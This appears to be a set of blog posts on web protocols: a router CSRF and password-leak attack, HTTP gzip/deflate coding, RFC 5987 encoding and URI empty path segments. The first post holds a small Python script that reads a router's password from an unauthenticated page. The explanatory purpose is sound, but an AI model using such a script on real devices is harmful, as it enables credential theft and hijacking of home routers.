According to the links within this article, although the root URI of the router requires authentication, the /password.cgi URI doesn't, and the returned HTML contains (but does not display) the plaintext of the password, as well as an HTML FORM for modifying the password that is exploitable via CSRF.
The attack… infected more than 4.5 million DSL modems… The CSRF (cross-site request forgery) vulnerability allowed attackers to use a simple script to steal passwords required to remotely log in to and control the devices. The attackers then configured the modems to use malicious domain name system servers that caused users trying to visit popular websites to instead connect to booby-trapped imposter sites.
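As a rough sketch of the disclosure half of that bug (not code from the article): the router address and the form-field name below are assumptions for illustration only.

```python
import re
import urllib.request

# Hypothetical router address; the real attack targeted modems on the local network.
ROUTER = "http://192.168.1.1"

# The root URI requires authentication, but /password.cgi reportedly does not,
# and the returned markup embeds the current password even though the page
# never displays it.
html = urllib.request.urlopen(f"{ROUTER}/password.cgi").read().decode("utf-8", "replace")

# "sysPassword" is a made-up field name standing in for wherever the page
# actually embeds the value.
leak = re.search(r'name=["\']?sysPassword["\']?[^>]*value=["\']([^"\']*)', html)
if leak:
    print("password present in the unauthenticated markup:", leak.group(1))
```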
| HTTP Content Coding Token | gzip | deflate | compress |
| --- | --- | --- | --- |
| Description | An encoding format produced by the file compression program "gzip" (GNU zip) | The "zlib" format as described in RFC 1950 | The encoding format produced by the common UNIX file compression program "compress" |
| Data Format | GZIP file format | ZLIB Compressed Data Format | The compress program's file format |
| Compression Method | Deflate compression method | Deflate compression method | LZW |

Deflate consists of LZ77 and Huffman coding.
Compress doesn't seem to be supported by current popular browsers, possibly due to the patents that once encumbered LZW.
Deflate isn't always implemented correctly. Some servers send the raw DEFLATE data format instead of the zlib data format that the "deflate" content coding actually names, and at least some versions of Internet Explorer likewise expect raw DEFLATE rather than zlib.
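If it helps to see the three containers side by side, here's a minimal sketch using Python's zlib module (the sample data is arbitrary):

```python
import zlib

data = b"Hello, HTTP content codings!" * 4

# gzip: DEFLATE data inside the gzip container (wbits = 16 + 15).
c = zlib.compressobj(wbits=16 + 15)
gzip_bytes = c.compress(data) + c.flush()

# deflate, as specified: DEFLATE data inside the zlib container (RFC 1950).
c = zlib.compressobj(wbits=15)
zlib_bytes = c.compress(data) + c.flush()

# What some servers actually sent for "deflate": raw DEFLATE, no container.
c = zlib.compressobj(wbits=-15)
raw_bytes = c.compress(data) + c.flush()

# A by-the-book "deflate" decoder expects the zlib container...
assert zlib.decompressobj(wbits=15).decompress(zlib_bytes) == data

# ...so feeding it the raw stream fails, which is the interop problem above.
try:
    zlib.decompressobj(wbits=15).decompress(raw_bytes)
except zlib.error as err:
    print("raw DEFLATE sent as 'deflate' fails:", err)
```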
From the document: ‘Appendix B. Implementation Report: The encoding defined in this document currently is used for two different HTTP header fields: “Content-Disposition”, defined in [RFC6266], and “Link”, defined in [RFC5988]. As the encoding is a profile/clarification of the one defined in [RFC2231] in 1997, many user agents already supported it for use in “Content-Disposition” when [RFC5987] got published.
Since the publication of [RFC5987], two more popular desktop user agents have added support for this encoding; see http://purl.org/NET/http/content-disposition-tests#encoding-2231-char for details. At this time, only one major desktop user agent (Safari) does not support it.
Note that the implementation in Internet Explorer 9 does not support the ISO-8859-1 encoding; this document revision acknowledges that UTF-8 is sufficient for expressing all code points, and removes the requirement to support ISO-8859-1.’
Yay for UTF-8!
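To make the encoding concrete, here's a minimal sketch of building such a header with Python's standard library; the filename and the attachment disposition are just example choices:

```python
from urllib.parse import quote

def content_disposition(filename: str) -> str:
    # RFC 6266 / RFC 5987: put non-ASCII filenames in the filename* parameter
    # as percent-encoded UTF-8 octets, prefixed with the charset (language omitted).
    return "attachment; filename*=UTF-8''" + quote(filename, safe="")

print(content_disposition("résumé.pdf"))
# attachment; filename*=UTF-8''r%C3%A9sum%C3%A9.pdf
```

In practice a plain filename parameter is often sent alongside filename* as a fallback for user agents that don't understand the encoding.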
Shortly after joining the Internet Explorer team I got a bug from a PM on a popular Microsoft web server product that I'll leave unnamed (from now on UWS). The bug said that IE was handling empty path segments incorrectly by not removing them before resolving dotted path segments.

Given a URI containing both a dotted path segment and an empty path segment, UWS would first remove the empty path segment and then resolve the dotted path segment. Given the same initial URI, IE simply resolves the dotted path segment against the empty path segment, removing them both (a concrete example is sketched at the end of this post). So, how did I resolve this bug? As "By Design" of course!
The URI RFC allows path segments of zero length and does not assign them any special meaning. So generic user agents that intend to work on the web must not treat an empty path segment any differently from a path segment with some text in it. In the case above, IE is doing the correct thing.
That's the case for generic user agents; servers, however, may decide that a URI with an empty path segment returns the same resource as the same URI without that empty path segment. Essentially they can decide to ignore empty path segments. Both IIS and Apache work this way, and thus return the same resource for a URI whether or not it contains the empty path segment.
The issue for UWS is that it removes empty path segments before resolving dotted path segments. It must follow normal URI resolution first and only then apply its own additional rules for empty path segments. Not doing that means it ends up violating URI equivalence rules: the original URI and its correctly resolved form are equivalent, yet UWS will not return the same resource for them.
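To make the two behaviors concrete, here's a minimal sketch of RFC 3986's remove_dot_segments algorithm; the sample path /a//../b is my own hypothetical, not the URI from the original bug report:

```python
import re

def remove_dot_segments(path: str) -> str:
    """RFC 3986 section 5.2.4, applied to a URI path."""
    output = []
    while path:
        if path.startswith("../"):
            path = path[3:]
        elif path.startswith("./"):
            path = path[2:]
        elif path.startswith("/./"):
            path = "/" + path[3:]
        elif path == "/.":
            path = "/"
        elif path.startswith("/../"):
            path = "/" + path[4:]
            if output:
                output.pop()
        elif path == "/..":
            path = "/"
            if output:
                output.pop()
        elif path in (".", ".."):
            path = ""
        else:
            # Move the first segment (up to, but not including, the next "/")
            # from the input to the output buffer.
            cut = path.find("/", 1)
            if cut == -1:
                output.append(path)
                path = ""
            else:
                output.append(path[:cut])
                path = path[cut:]
    return "".join(output)

path = "/a//../b"  # hypothetical: one empty segment followed by a dotted segment

# What the URI RFC (and IE) does: ".." consumes the empty segment.
print(remove_dot_segments(path))                        # -> /a/b

# What UWS did: strip empty segments first, then resolve dots.
print(remove_dot_segments(re.sub("/{2,}", "/", path)))  # -> /b
```

Following the RFC, ".." consumes the empty segment that precedes it; stripping empty segments first changes which segment gets consumed, which is exactly the equivalence violation described above.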
Raymond Chen has some thought experiments useful for discovering various kinds of stupidity in software design.
Tim Berners-Lee's principles of Web design include my favorite: the Test of Independent Invention. It contains a thought experiment involving the construction of the MMM (Multi-Media Mesh) with MRIs (Media Resource Identifiers) and MMTP (Multi-Media Transport Protocol).
The Internet design principles (RFC 1958) include the Robustness Principle: be strict when sending and tolerant when receiving. It's a good one, but applied too liberally it can lead to interop issues. For instance, consider web browsers. Imagine one browser becomes so popular that web devs create web pages and test them only in that popular browser. They don't ensure their pages conform to standards and accidentally end up depending on the way this popular browser tolerantly accepts non-standard input. That non-standard behavior becomes a de facto standard, and future updates to the actual standard essentially have the decision made for them.